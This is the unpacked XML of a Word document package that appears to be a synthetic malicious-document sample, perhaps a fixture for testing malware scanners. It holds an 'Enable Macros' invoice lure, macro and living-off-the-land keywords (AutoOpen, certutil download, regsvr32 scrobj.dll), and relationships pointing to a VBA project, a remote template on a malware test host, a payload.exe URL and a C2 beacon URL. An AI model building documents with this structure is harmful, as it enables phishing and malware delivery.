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in" ContentType="application/vnd.ms-office.vbaProject"/>
  <Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>
</Types>
</file>

<file path=_rels/.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/>
</Relationships>
</file>

<file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
  <w:body>
    <w:p>
      <w:r>
        <w:t>INVOICE - Enable Macros to View</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>AutoOpen Shell cmd.exe powershell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>WScript.Shell CreateObject Run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>certutil.exe urlcache download</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>regsvr32 scrobj.dll</w:t>
      </w:r>
    </w:p>
  </w:body>
</w:document>
</file>

<file path=word/_rels/document.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/vbaProject" Target="vbaProject.bin"/>
<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="http://malware.wicar.org/template.dotm" TargetMode="External"/>
<Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://185.220.101.1/payload.exe" TargetMode="External"/>
<Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://evil-c2-server.ru/beacon.php" TargetMode="External"/>
</Relationships>
</file>